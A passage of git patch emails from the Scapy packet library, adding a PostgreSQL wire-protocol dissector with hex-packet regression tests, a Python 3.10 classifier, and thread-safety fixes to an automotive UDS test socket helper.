adjust=lambda pkt, x: x + 8 + ), + IntEnumField("method", default=0, enum=AUTH_CODES), + StrLenField("optional", None, length_from=lambda pkt: pkt.len - 8), + ] + + +class ParameterStatus(_ZeroPadding): + name = "Parameter Status" + fields_desc = [ + ByteTagField(b"S"), + FieldLenField( + "len", + None, + fmt="I", + length_of=("parameter", "value"), + adjust=lambda pkt, x: x + 4, + ), + StrNullField( + "parameter", + "", + ), + StrNullField( + "value", + "", + ), + ] + + +class Query(_ZeroPadding): + name = "Simple Query" + fields_desc = [ + ByteTagField(b"Q"), + FieldLenField( + "len", None, length_of="query", + fmt="I", adjust=lambda pkt, x: x + 5 + ), + StrNullField("query", None), + ] + + +class CommandComplete(_ZeroPadding): + name = "Command Completion Response" + fields_desc = [ + ByteTagField(b"C"), + FieldLenField( + "len", None, length_of="cmdtag", + fmt="I", adjust=lambda pkt, x: x + 4 + ), + StrLenField("cmdtag", "", length_from=lambda pkt: pkt.len - 4), + ] + + +class BackendKeyData(_ZeroPadding): + name = "Backend Key Data" + fields_desc = [ + ByteTagField(b"K"), + FieldLenField("len", None, fmt="I"), + SignedIntField("pid", 0), + SignedIntField("key", 0), + ] + + +STATUS_TYPE = { + b"E": "InFailedTransaction", + b"I": "Idle", + b"T": "InTransaction", +} + + +class ReadyForQuery(_ZeroPadding): + name = "Ready Signal" + fields_desc = [ + ByteTagField(b"Z"), + SignedIntField("len", 6), + CharEnumField("status", b"I", STATUS_TYPE), + ] + + +class ColumnDescription(_ZeroPadding): + name = "Column Description" + fields_desc = [ + StrNullField("col", None), + SignedIntField("tableoid", 0), + SignedShortField("colno", 0), + SignedIntField("typeoid", 0), + SignedShortField("typelen", 0), + SignedIntField("typemod", 0), + SignedShortField("format", 0), + ] + + +class RowDescription(_ZeroPadding): + name = "Row Description" + fields_desc = [ + ByteTagField(b"T"), + FieldLenField( + "len", None, fmt="I", length_of="cols", adjust=lambda pkt, x: x + 6 + ), + SignedShortField("numfields", 0), + PacketListField( + "cols", + [], + pkt_cls=ColumnDescription, + count_from=lambda pkt: pkt.numfields, + length_from=lambda pkt: pkt.len - 6, + ), + ] + + +class SignedIntStrPair(_ZeroPadding): + name = "Bytes data" + fields_desc = [ + FieldLenField("len", None, length_of="data", fmt="I"), + StrLenField("data", None, length_from=lambda pkt: pkt.len), + ] + + +class DataRow(_ZeroPadding): + name = "Data Row" + fields_desc = [ + ByteTagField(b"D"), + FieldLenField( + "len", None, fmt="I", length_of="data", adjust=lambda pkt, x: x + 6 + ), + SignedShortField("numfields", 0), + PacketListField( + "data", + [], + pkt_cls=SignedIntStrPair, + count_from=lambda pkt: pkt.numfields, + length_from=lambda pkt: pkt.len - 6, + ), + ] + + +# See https://www.postgresql.org/docs/current/protocol-error-fields.html +ERROR_FIELD = { + b"S": "Severity", + b"V": "SeverityNonLocalized", + b"C": "Code", + b"M": "Message", + b"D": "Detail", + b"H": "Hint", + b"P": "Position", + b"p": "InternalPosition", + b"q": "InternalQuery", + b"W": "Where", + b"s": "SchemaName", + b"t": "TableName", + b"c": "ColumnName", + b"d": "DataTypeName", + b"n": "ConstraintName", + b"F": "File", + b"L": "Line", + b"R": "Routine", +} + + +class ErrorResponseField(StrNullField): + def m2i(self, pkt, x): + """Unpack into a tuple of Field, Value.""" + i = super(ErrorResponseField, self).m2i(pkt, x) + i_code = i[0:1] # Python 2/3 compatible + return (ERROR_FIELD.get(i_code, i_code), i[1:]) + + +class ErrorResponse(_ZeroPadding): + name = "Error Response" + fields_desc = [ + ByteTagField(b"E"), + FieldLenField( + "len", None, length_of="error_fields", + fmt="I", adjust=lambda pkt, x: x + 5 + ), + FieldListField( + "error_fields", + [], + ErrorResponseField("value", None), + length_from=lambda pkt: pkt.len - 5, + ), + ByteField("terminator", None), + ] + + +class Terminate(_ZeroPadding): + name = "Termination Request" + fields_desc = [ + ByteTagField(b"X"), + SignedIntField("len", 4), + ] + + +class BindComplete(_ZeroPadding): + name = "Bind Complete" + fields_desc = [ + ByteTagField(b"2"), + SignedIntField("len", 4), + ] + + +CLOSE_DESCRIBE_TYPE = {b"S": "PreparedStatement", b"P": "Portal"} + + +class Close(_ZeroPadding): + name = "Close Request" + fields_desc = [ + ByteTagField(b"C"), + FieldLenField( + "len", None, fmt="I", length_of="statement", + adjust=lambda pkt, x: x + 6 + ), + CharEnumField("close_type", b"S", enum=CLOSE_DESCRIBE_TYPE), + StrNullField( + "statement", + "", + ), + ] + + +class CloseComplete(_ZeroPadding): + name = "Close Complete" + fields_desc = [ + ByteTagField(b"3"), + SignedIntField("len", 4), + ] + + +class Describe(_ZeroPadding): + name = "Describe" + fields_desc = [ + ByteTagField(b"D"), + FieldLenField( + "len", None, fmt="I", length_of="statement", + adjust=lambda pkt, x: x + 6 + ), + CharEnumField("close_type", b"S", enum=CLOSE_DESCRIBE_TYPE), + StrNullField("statement", ""), + ] + + +class EmptyQueryResponse(_ZeroPadding): + name = "Empty Query Response" + fields_desc = [ + ByteTagField(b"I"), + SignedIntField("len", 4), + ] + + +class Flush(_ZeroPadding): + name = "Flush Request" + fields_desc = [ + ByteTagField(b"H"), + SignedIntField("len", 4), + ] + + +class NoData(_ZeroPadding): + name = "No Data Response" + fields_desc = [ + ByteTagField(b"n"), + SignedIntField("len", 4), + ] + + +class ParseComplete(_ZeroPadding): + name = "Parse Complete Response" + fields_desc = [ + ByteTagField(b"1"), + SignedIntField("len", 4), + ] + + +class PortalSuspended(_ZeroPadding): + name = "Portal Suspended Response" + fields_desc = [ + ByteTagField(b"s"), + SignedIntField("len", 4), + ] + + +class Sync(_ZeroPadding): + name = "Sync Request" + fields_desc = [ + ByteTagField(b"S"), + SignedIntField("len", 4), + ] + + +class Parse(_ZeroPadding): + name = "Parse Request" + fields_desc = [ + ByteTagField(b"P"), + _FieldsLenField( + "len", + None, + fmt="I", + length_of=("destination", "query", "params"), + adjust=lambda pkt, x: x + 8, + ), + StrNullField("destination", ""), + StrNullField("query", ""), + FieldLenField("num_param_dtypes", None, fmt="H", count_of="params"), + FieldListField( + "params", + [], + SignedIntField("param", None), + count_from="num_param_dtypes", + ), + ] + + +class Execute(_ZeroPadding): + name = "Execute Request" + fields_desc = [ + ByteTagField(b"E"), + FieldLenField( + "len", None, fmt="I", length_of="portal", + adjust=lambda pkt, x: x + 9 + ), + StrNullField( + "portal", + "", + ), + SignedIntField("rows", 0), + ] + + +class PasswordMessage(_ZeroPadding): + """ + Identifies the message as a password response. + Note that this is also used for GSSAPI, SSPI and SASL + response messages. The exact message type can be deduced + from the context. + """ + + name = "Password Request Response" + fields_desc = [ + ByteTagField(b"p"), + FieldLenField( + "len", None, fmt="I", length_of="password", + adjust=lambda pkt, x: x + 4 + ), + StrLenField("password", None, length_from=lambda pkt: pkt.len - 4), + ] + + +class NoticeResponse(_ZeroPadding): + name = "Notice Response" + fields_desc = [ + ByteTagField(b"N"), + FieldLenField( + "len", None, length_of="notice_fields", fmt="I", + adjust=lambda pkt, x: x + 5 + ), + FieldListField( + "notice_fields", + [], + ErrorResponseField("value", None), + length_from=lambda pkt: pkt.len - 5, + ), + ByteField("terminator", None), + ] + + +class NotificationResponse(_ZeroPadding): + name = "Password Request Response" + fields_desc = [ + ByteTagField(b"A"), + _FieldsLenField( + "len", + None, + fmt="I", + length_of=("channel", "payload"), + adjust=lambda pkt, x: x + 8, + ), + SignedIntField("process_id", 0), + StrNullField("channel", None), + StrNullField("payload", None), + ] + + +class NegotiateProtocolVersion(_ZeroPadding): + name = "Negotiate Protocol Version Response" + fields_desc = [ + ByteTagField(b"v"), + FieldLenField( + "len", None, fmt="I", length_of="option", + adjust=lambda pkt, x: x + 12 + ), + SignedIntField("min_minor_version", 0), + SignedIntField("unrecognized_options", 0), + StrNullField("option", None), + ] + + +class FunctionCallResponse(_ZeroPadding): + name = "Function Call Response" + fields_desc = [ + ByteTagField(b"V"), + FieldLenField( + "len", None, fmt="I", length_of="result", + adjust=lambda pkt, x: x + 8 + ), + FieldLenField("result_len", None, length_of="result"), + StrLenField("result", None, length_from=lambda pkt: pkt.result_len), + ] + + +class ParameterDescription(_ZeroPadding): + name = "Parameter Description" + fields_desc = [ + ByteTagField(b"t"), + FieldLenField( + "len", None, fmt="I", length_of="dtypes", + adjust=lambda pkt, x: x + 6 + ), + SignedShortField("dtypes_len", 0), + FieldListField( + "dtypes", + [], + SignedIntField("dtype", None), + count_from=lambda pkt: pkt.dtypes_len, + ), + ] + + +class CopyData(_ZeroPadding): + name = "Copy Data" + fields_desc = [ + ByteTagField(b"d"), + FieldLenField( + "len", None, fmt="I", length_of="data", + adjust=lambda pkt, x: x + 4 + ), + StrLenField("data", None, length_from=lambda pkt: pkt.len - 4), + ] + + +class CopyDone(_ZeroPadding): + name = "Copy Done" + fields_desc = [ + ByteTagField(b"c"), + SignedIntField("len", 4), + ] + + +class CopyFail(_ZeroPadding): + name = "Copy Fail Reason" + fields_desc = [ + ByteTagField(b"f"), + FieldLenField( + "len", None, fmt="I", length_of="reason", + adjust=lambda pkt, x: x + 4 + ), + StrLenField("reason", None, length_from=lambda pkt: pkt.len - 4), + ] + + +class CancelRequest(Packet): + name = "Cancel Request" + fields_desc = [ + SignedIntField("len", 16), + SignedIntField("request_code", 80877102), + SignedIntField("process_id", 0), + SignedIntField("secret", 0), + ] + + +class GSSENCRequest(Packet): + name = "GSSENC Request" + fields_desc = [ + SignedIntField("len", 8), + SignedIntField("request_code", 80877104), + ] + + +class CopyInResponse(_ZeroPadding): + name = "Copy in Response" + fields_desc = [ + ByteTagField(b"G"), + FieldLenField( + "len", None, fmt="I", length_of="cols", adjust=lambda pkt, x: x + 7 + ), + ByteField("format", 0), + ShortField("ncols", 0), + FieldListField( + "cols", + [], + ShortField("format", None), + count_from=lambda pkt: pkt.ncols, + ), + ] + + +class CopyOutResponse(_ZeroPadding): + name = "Copy out Response" + fields_desc = [ + ByteTagField(b"H"), + FieldLenField( + "len", None, fmt="I", length_of="cols", adjust=lambda pkt, x: x + 7 + ), + ByteField("format", 0), + ShortField("ncols", 0), + FieldListField( + "cols", + [], + ShortField("format", None), + count_from=lambda pkt: pkt.ncols, + ), + ] + + +class CopyBothResponse(_ZeroPadding): + name = "Copy both Response" + fields_desc = [ + ByteTagField(b"W"), + FieldLenField( + "len", None, fmt="I", length_of="cols", adjust=lambda pkt, x: x + 7 + ), + ByteField("format", 0), + ShortField("ncols", 0), + FieldListField( + "cols", + [], + ShortField("format", None), + count_from=lambda pkt: pkt.ncols, + ), + ] + + +FRONTEND_TAG_TO_PACKET_CLS = { + # b'B' : 'Bind', # TODO + b"C": Close, + b"d": CopyData, + b"c": CopyDone, + b"f": CopyFail, + b"D": Describe, + b"E": Execute, + b"H": Flush, + # b'F': 'FunctionCall', # TODO + b"P": Parse, + b"p": PasswordMessage, + b"Q": Query, + b"S": Sync, + b"X": Terminate, +} + +BACKEND_TAG_TO_PACKET_CLS = { + b"R": Authentication, + b"K": BackendKeyData, + b"2": BindComplete, + b"3": CloseComplete, + b"C": CommandComplete, + b"d": CopyData, + b"c": CopyDone, + b"G": CopyInResponse, + b"H": CopyOutResponse, + b"W": CopyBothResponse, + b"D": DataRow, + b"I": EmptyQueryResponse, + b"E": ErrorResponse, + b"V": FunctionCallResponse, + b"v": NegotiateProtocolVersion, + b"n": NoData, + b"N": NoticeResponse, + b"A": NotificationResponse, + b"t": ParameterDescription, + b"S": ParameterStatus, + b"1": ParseComplete, + b"s": PortalSuspended, + b"Z": ReadyForQuery, + b"T": RowDescription, +} + + +class PostgresFrontend(_BasePostgres): + cls_mapping = FRONTEND_TAG_TO_PACKET_CLS + + +class PostgresBackend(_BasePostgres): + cls_mapping = BACKEND_TAG_TO_PACKET_CLS + + +bind_layers(TCP, PostgresFrontend, dport=5432) +bind_layers(TCP, PostgresBackend, sport=5432) diff --git a/test/contrib/postgres.uts b/test/contrib/postgres.uts new file mode 100644 index 00000000000..68701459fb9 --- /dev/null +++ b/test/contrib/postgres.uts @@ -0,0 +1,240 @@ +# Postgres Related regression tests +# +# Type the following command to launch start the tests: +# $ test/run_tests -P "load_contrib('postgres')" -t test/contrib/postgres.uts + ++ postgres + += postgres initialization + +from scapy.contrib.postgres import * + +ssl_request = "\x00\x00\x00\x08\x04\xd2\x16\x2f" + +startup = Startup( + b"\x00\x00\x00\x57\x00\x03\x00\x00\x75\x73\x65\x72\x00\x70\x6f\x73" + b"\x74\x67\x72\x65\x73\x00\x64\x61\x74\x61\x62\x61\x73\x65\x00\x70" + b"\x6f\x73\x74\x67\x72\x65\x73\x00\x61\x70\x70\x6c\x69\x63\x61\x74" + b"\x69\x6f\x6e\x5f\x6e\x61\x6d\x65\x00\x70\x73\x71\x6c\x00\x63\x6c" + b"\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x57\x49" + b"\x4e\x31\x32\x35\x32\x00\x00" +) + +assert startup.len == 87 +assert startup.protocol_version_major == 3 +assert startup.protocol_version_minor == 0 +assert ( + startup.options + == b"user\x00postgres\x00database\x00postgres\x00application_name\x00psql\x00client_encoding\x00WIN1252\x00\x00" +) + +init_packet = ( + b"\x52\x00\x00\x00\x08\x00\x00\x00\x00\x53\x00\x00\x00\x1a\x61\x70" + b"\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x5f\x6e\x61\x6d\x65\x00\x70" + b"\x73\x71\x6c\x00\x53\x00\x00\x00\x1c\x63\x6c\x69\x65\x6e\x74\x5f" + b"\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x57\x49\x4e\x31\x32\x35\x32" + b"\x00\x53\x00\x00\x00\x17\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00" + b"\x49\x53\x4f\x2c\x20\x4d\x44\x59\x00\x53\x00\x00\x00\x26\x64\x65" + b"\x66\x61\x75\x6c\x74\x5f\x74\x72\x61\x6e\x73\x61\x63\x74\x69\x6f" + b"\x6e\x5f\x72\x65\x61\x64\x5f\x6f\x6e\x6c\x79\x00\x6f\x66\x66\x00" + b"\x53\x00\x00\x00\x17\x69\x6e\x5f\x68\x6f\x74\x5f\x73\x74\x61\x6e" + b"\x64\x62\x79\x00\x6f\x66\x66\x00\x53\x00\x00\x00\x19\x69\x6e\x74" + b"\x65\x67\x65\x72\x5f\x64\x61\x74\x65\x74\x69\x6d\x65\x73\x00\x6f" + b"\x6e\x00\x53\x00\x00\x00\x1b\x49\x6e\x74\x65\x72\x76\x61\x6c\x53" + b"\x74\x79\x6c\x65\x00\x70\x6f\x73\x74\x67\x72\x65\x73\x00\x53\x00" + b"\x00\x00\x14\x69\x73\x5f\x73\x75\x70\x65\x72\x75\x73\x65\x72\x00" + b"\x6f\x6e\x00\x53\x00\x00\x00\x19\x73\x65\x72\x76\x65\x72\x5f\x65" + b"\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x54\x46\x38\x00\x53\x00\x00" + b"\x00\x32\x73\x65\x72\x76\x65\x72\x5f\x76\x65\x72\x73\x69\x6f\x6e" + b"\x00\x31\x34\x2e\x32\x20\x28\x44\x65\x62\x69\x61\x6e\x20\x31\x34" + b"\x2e\x32\x2d\x31\x2e\x70\x67\x64\x67\x31\x31\x30\x2b\x31\x29\x00" + b"\x53\x00\x00\x00\x23\x73\x65\x73\x73\x69\x6f\x6e\x5f\x61\x75\x74" + b"\x68\x6f\x72\x69\x7a\x61\x74\x69\x6f\x6e\x00\x70\x6f\x73\x74\x67" + b"\x72\x65\x73\x00\x53\x00\x00\x00\x23\x73\x74\x61\x6e\x64\x61\x72" + b"\x64\x5f\x63\x6f\x6e\x66\x6f\x72\x6d\x69\x6e\x67\x5f\x73\x74\x72" + b"\x69\x6e\x67\x73\x00\x6f\x6e\x00\x53\x00\x00\x00\x15\x54\x69\x6d" + b"\x65\x5a\x6f\x6e\x65\x00\x45\x74\x63\x2f\x55\x54\x43\x00\x4b\x00" + b"\x00\x00\x0c\x00\x00\x01\x7f\x43\x4c\x36\xa5\x5a\x00\x00\x00\x05\x49" +) + += postgres backend sequence + +init = PostgresBackend(init_packet) + +assert isinstance(init.contents[0], Authentication) +assert init.contents[0].len == 8 +assert init.contents[0].method == 0 +assert len(init.contents) == 16 +assert isinstance(init.contents[1], ParameterStatus) +assert init.contents[1].len == 26 +assert init.contents[1].parameter == b"application_name" +assert init.contents[1].value == b"psql" + += simple queries + +simple_query_packet = ( + b"\x51\x00\x00\x00\x15\x53\x45\x4c\x45\x43\x54\x20\x56\x45\x52\x53" + b"\x49\x4f\x4e\x28\x29\x00" +) +simple_query = PostgresFrontend(simple_query_packet) + +assert isinstance(simple_query.contents[0], Query) +assert simple_query.contents[0].len == 21 +assert simple_query.contents[0].query == b"SELECT VERSION()" + +pair = SignedIntStrPair(b"\x00\x00\x00\x04\x01\x02\x03\x04") + +assert pair.len == 4 +assert pair.data == b"\x01\x02\x03\x04" + +command_response_packet = ( + b"\x54\x00\x00\x00\x20\x00\x01\x76\x65\x72\x73\x69\x6f\x6e\x00\x00" + b"\x00\x00\x00\x00\x00\x00\x00\x00\x19\xff\xff\xff\xff\xff\xff\x00" + b"\x00\x44\x00\x00\x00\x85\x00\x01\x00\x00\x00\x7b\x50\x6f\x73\x74" + b"\x67\x72\x65\x53\x51\x4c\x20\x31\x34\x2e\x32\x20\x28\x44\x65\x62" + b"\x69\x61\x6e\x20\x31\x34\x2e\x32\x2d\x31\x2e\x70\x67\x64\x67\x31" + b"\x31\x30\x2b\x31\x29\x20\x6f\x6e\x20\x78\x38\x36\x5f\x36\x34\x2d" + b"\x70\x63\x2d\x6c\x69\x6e\x75\x78\x2d\x67\x6e\x75\x2c\x20\x63\x6f" + b"\x6d\x70\x69\x6c\x65\x64\x20\x62\x79\x20\x67\x63\x63\x20\x28\x44" + b"\x65\x62\x69\x61\x6e\x20\x31\x30\x2e\x32\x2e\x31\x2d\x36\x29\x20" + b"\x31\x30\x2e\x32\x2e\x31\x20\x32\x30\x32\x31\x30\x31\x31\x30\x2c" + b"\x20\x36\x34\x2d\x62\x69\x74\x43\x00\x00\x00\x0d\x53\x45\x4c\x45" + b"\x43\x54\x20\x31\x00\x5a\x00\x00\x00\x05\x49" +) + += row data response + +command_response = PostgresBackend(command_response_packet) + +assert len(command_response.contents) == 4 +assert isinstance(command_response.contents[0], RowDescription) +rd = command_response.contents[0] +assert rd.len == 32 +assert rd.numfields == 1 +assert rd.cols[0].col == b"version" +assert rd.cols[0].tableoid == 0 +assert rd.cols[0].colno == 0 +assert rd.cols[0].typeoid == 25 +assert rd.cols[0].typelen == -1 +assert rd.cols[0].format == 0 +assert rd.cols[0].typemod == -1 + +assert isinstance(command_response.contents[1], DataRow) +assert command_response.contents[1].len == 133 +assert command_response.contents[1].numfields == 1 +assert len(command_response.contents[1].data) == 1 +assert isinstance(command_response.contents[1].data[0], SignedIntStrPair) +assert command_response.contents[1].data[0].len == 123 +assert ( + command_response.contents[1].data[0].data + == b"PostgreSQL 14.2 (Debian 14.2-1.pgdg110+1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 10.2.1-6) 10.2.1 20210110, 64-bit" +) + +assert isinstance(command_response.contents[2], CommandComplete) +assert isinstance(command_response.contents[3], ReadyForQuery) + +three_col_rd = RowDescription( + b"\x54\x00\x00\x00\x55\x00\x03\x6e\x61\x6d\x65\x00\x00\x00\x00\x00" + b"\x00\x00\x00\x00\x00\x19\xff\xff\xff\xff\xff\xff\x00\x00\x73\x65" + b"\x74\x74\x69\x6e\x67\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19" + b"\xff\xff\xff\xff\xff\xff\x00\x00\x64\x65\x73\x63\x72\x69\x70\x74" + b"\x69\x6f\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\xff\xff" + b"\xff\xff\xff\xff\x00\x00" +) +assert three_col_rd.len == 85 +assert three_col_rd.numfields == 3 +assert len(three_col_rd.cols) == 3 + +three_col_dr = DataRow( + b"\x44\x00\x00\x00\x63\x00\x03\x00\x00\x00\x17\x61\x6c\x6c\x6f\x77" + b"\x5f\x73\x79\x73\x74\x65\x6d\x5f\x74\x61\x62\x6c\x65\x5f\x6d\x6f" + b"\x64\x73\x00\x00\x00\x03\x6f\x66\x66\x00\x00\x00\x37\x41\x6c\x6c" + b"\x6f\x77\x73\x20\x6d\x6f\x64\x69\x66\x69\x63\x61\x74\x69\x6f\x6e" + b"\x73\x20\x6f\x66\x20\x74\x68\x65\x20\x73\x74\x72\x75\x63\x74\x75" + b"\x72\x65\x20\x6f\x66\x20\x73\x79\x73\x74\x65\x6d\x20\x74\x61\x62" + b"\x6c\x65\x73\x2e" +) + +assert three_col_dr.numfields == 3 +assert len(three_col_dr.data) == 3 +assert three_col_dr.data[0].len == 23 +assert three_col_dr.data[0].data == b"allow_system_table_mods" +assert three_col_dr.data[1].len == 3 +assert three_col_dr.data[1].data == b"off" +assert three_col_dr.data[2].len == 55 +assert ( + three_col_dr.data[2].data + == b"Allows modifications of the structure of system tables." +) + += errors + +error_response = ErrorResponse( + b"\x45\x00\x00\x00\x69\x53\x45\x52\x52\x4f\x52\x00\x56\x45\x52\x52" + b"\x4f\x52\x00\x43\x34\x32\x50\x30\x31\x00\x4d\x72\x65\x6c\x61\x74" + b"\x69\x6f\x6e\x20\x22\x66\x6f\x6f\x62\x61\x72\x22\x20\x64\x6f\x65" + b"\x73\x20\x6e\x6f\x74\x20\x65\x78\x69\x73\x74\x00\x50\x31\x35\x00" + b"\x46\x70\x61\x72\x73\x65\x5f\x72\x65\x6c\x61\x74\x69\x6f\x6e\x2e" + b"\x63\x00\x4c\x31\x33\x38\x31\x00\x52\x70\x61\x72\x73\x65\x72\x4f" + b"\x70\x65\x6e\x54\x61\x62\x6c\x65\x00\x00" +) + +assert len(error_response.error_fields) == 8 +assert error_response.error_fields[0] == ("Severity", b"ERROR") +assert error_response.error_fields[7] == ("Routine", b"parserOpenTable") + += copy data response and request + +copyin_response = CopyInResponse(b"\x47\x00\x00\x00\x0f\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00") + +assert copyin_response.len == 15 +assert copyin_response.format == 0 # Text +assert len(copyin_response.cols) == 4 +assert copyin_response.ncols == 4 +assert copyin_response.cols[0] == 0 # Text +assert copyin_response.cols[1] == 0 # Text +assert copyin_response.cols[2] == 0 # Text +assert copyin_response.cols[3] == 0 # Text + +copydata_in = PostgresFrontend(b"\x64\x00\x00\x00\x10\x31\x2c\x42\x6f\x62\x2c\x32\x33\x2c\x31\x0d" \ +b"\x0a\x64\x00\x00\x00\x12\x32\x2c\x53\x61\x6c\x6c\x79\x2c\x34\x33" \ +b"\x2c\x32\x0d\x0a\x64\x00\x00\x00\x14\x33\x2c\x50\x61\x72\x64\x65" \ +b"\x65\x70\x2c\x35\x34\x2c\x33\x0d\x0a\x64\x00\x00\x00\x0f\x34\x2c" \ +b"\x53\x75\x2c\x33\x32\x2c\x34\x0d\x0a\x64\x00\x00\x00\x0f\x35\x2c" \ +b"\x58\x69\x2c\x34\x33\x2c\x35\x0d\x0a\x64\x00\x00\x00\x0e\x36\x2c" \ +b"\x50\x69\x70\x2c\x36\x36\x2c\x36\x63\x00\x00\x00\x04" +) + +copyout_response = CopyOutResponse(b"\x48\x00\x00\x00\x0f\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00") +assert copyout_response.len == 15 + +# Combined message +copydata_out = PostgresBackend(b"\x48\x00\x00\x00\x0f\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00" \ +b"\x64\x00\x00\x00\x0f\x31\x09\x42\x6f\x62\x09\x32\x33\x09\x31\x0a" \ +b"\x64\x00\x00\x00\x11\x32\x09\x53\x61\x6c\x6c\x79\x09\x34\x33\x09" \ +b"\x32\x0a\x64\x00\x00\x00\x13\x33\x09\x50\x61\x72\x64\x65\x65\x70" \ +b"\x09\x35\x34\x09\x33\x0a\x64\x00\x00\x00\x0e\x34\x09\x53\x75\x09" \ +b"\x33\x32\x09\x34\x0a\x64\x00\x00\x00\x0e\x35\x09\x58\x69\x09\x34" \ +b"\x33\x09\x35\x0a\x64\x00\x00\x00\x0f\x36\x09\x50\x69\x70\x09\x36" \ +b"\x36\x09\x36\x0a\x63\x00\x00\x00\x04\x43\x00\x00\x00\x0b\x43\x4f" \ +b"\x50\x59\x20\x36\x00\x5a\x00\x00\x00\x05\x49") + +assert len(copydata_out.contents) == 10 +assert copydata_out.contents[0].len == 15 +assert isinstance(copydata_out.contents[0], CopyOutResponse) +assert isinstance(copydata_out.contents[1], CopyData) +assert copydata_out.contents[1].len == 15 +assert copydata_out.contents[1].data == b'1\tBob\t23\t1\n' +assert isinstance(copydata_out.contents[2], CopyData) +assert copydata_out.contents[2].data == b'2\tSally\t43\t2\n' +assert isinstance(copydata_out.contents[3], CopyData) +assert copydata_out.contents[3].data == b'3\tPardeep\t54\t3\n' +assert isinstance(copydata_out.contents[4], CopyData) +assert copydata_out.contents[4].data == b'4\tSu\t32\t4\n' +assert isinstance(copydata_out.contents[5], CopyData) +assert copydata_out.contents[5].data == b'5\tXi\t43\t5\n' +assert isinstance(copydata_out.contents[6], CopyData) +assert copydata_out.contents[6].data == b'6\tPip\t66\t6\n' +assert isinstance(copydata_out.contents[7], CopyDone) +assert isinstance(copydata_out.contents[8], CommandComplete) +assert isinstance(copydata_out.contents[9], ReadyForQuery) From 2c92b0350ab5df8ea0adc164fb4441c979bec568 Mon Sep 17 00:00:00 2001 From: Anthony Shaw Date: Tue, 12 Jul 2022 16:25:15 +1000 Subject: [PATCH 0849/1632] Add Python 3.10 classifier --- setup.py | 1 + 1 file changed, 1 insertion(+) diff --git a/setup.py b/setup.py index 25a6c9f8559..6f096c420da 100755 --- a/setup.py +++ b/setup.py @@ -97,6 +97,7 @@ def process_ignore_tags(buffer): "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", + "Programming Language :: Python :: 3.10", "Topic :: Security", "Topic :: System :: Networking", "Topic :: System :: Networking :: Monitoring", From c406c7d98985c7925eacd22a06965fae04cab7b0 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 16 Jul 2022 11:33:51 +0200 Subject: [PATCH 0850/1632] Improve UDS tests stability (#3687) * Add debug code to investigate #3677 * fix bug * add stronger cleanup * speedup unit tests --- .../automotive/scanner/uds_scanner.uts | 11 ++++-- test/testsocket.py | 37 +++++++++++++------ 2 files changed, 33 insertions(+), 15 deletions(-) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index c644886f864..46ad7619c1f 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -7,7 +7,7 @@ import io import pickle from scapy.contrib.isotp import ISOTPMessageBuilder -from test.testsocket import TestSocket, cleanup_testsockets, UnstableSocket +from test.testsocket import TestSocket, cleanup_testsockets, UnstableSocket, open_test_sockets ############ ############ @@ -53,6 +53,7 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstabl ecu.close() except Exception: pass + assert len(open_test_sockets) < 3 ecu = TestSocket(UDS) tester.pair(ecu) answering_machine = EcuAnsweringMachine(supported_responses=supported_responses, main_socket=ecu, basecls=UDS, verbose=False) @@ -62,9 +63,10 @@ def executeScannerInVirtualEnvironment(supported_responses, enumerators, unstabl except OSError: continue sim = threading.Thread(target=answering_machine_thread) - sim.start() - answering_machine_started.wait(timeout=10) try: + assert len(open_test_sockets) < 3 + sim.start() + answering_machine_started.wait(timeout=10) scanner = UDS_Scanner( reconnect(), reset_handler=reset, reconnect_handler=reconnect, test_cases=enumerators, timeout=0.1, retry_if_none_received=True, unittest=True, @@ -114,7 +116,7 @@ assert len(msgs) = Create ECU-Clone from packets -mEcu = Ecu(logging=False, verbose=False, store_supported_responses=True) +mEcu = Ecu(logging=False, verbose=False, store_supported_responses=True, lookahead=3) for p in msgs: if isinstance(p, CAN) and p.data == b"ECURESET": @@ -1008,4 +1010,5 @@ assert 0xffff in ids = Delete testsockets + cleanup_testsockets() diff --git a/test/testsocket.py b/test/testsocket.py index 7efa89996c2..32252ded11e 100644 --- a/test/testsocket.py +++ b/test/testsocket.py @@ -8,7 +8,9 @@ import time import random + from socket import socket +from threading import Lock from scapy.config import conf from scapy.automaton import ObjectPipe, select_objects @@ -23,6 +25,9 @@ class TestSocket(SuperSocket): + + test_socket_mutex = Lock() + def __init__(self, basecls=None): # type: (Optional[Type[Packet]]) -> None global open_test_sockets @@ -45,22 +50,28 @@ def __exit__(self, exc_type, exc_value, traceback): def close(self): # type: () -> None global open_test_sockets - for s in self.paired_sockets: + + with self.test_socket_mutex: + if self.closed: + return + + self.closed = True + for s in self.paired_sockets: + try: + s.paired_sockets.remove(self) + except (ValueError, AttributeError, TypeError): + pass + super(TestSocket, self).close() try: - s.paired_sockets.remove(self) + open_test_sockets.remove(self) except (ValueError, AttributeError, TypeError): pass - self.closed = True - super(TestSocket, self).close() - try: - open_test_sockets.remove(self) - except (ValueError, AttributeError, TypeError): - pass def pair(self, sock): # type: (TestSocket) -> None - self.paired_sockets += [sock] - sock.paired_sockets += [self] + with self.test_socket_mutex: + self.paired_sockets += [sock] + sock.paired_sockets += [self] def send(self, x): # type: (Packet) -> int @@ -136,5 +147,9 @@ def cleanup_testsockets(): """ Helper function to remove TestSocket objects after a test """ - for sock in open_test_sockets: + count = 100 + while len(open_test_sockets) and count > 0: + print(open_test_sockets) + count -= 1 + sock = open_test_sockets[0] sock.close() From b26f2283379d3bba48d575c1fffd1c3cdeaf64c2 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Mon, 18 Jul 2022 09:55:55 +0200 Subject: [PATCH 0851/1632] Kerberos update (#3688) * 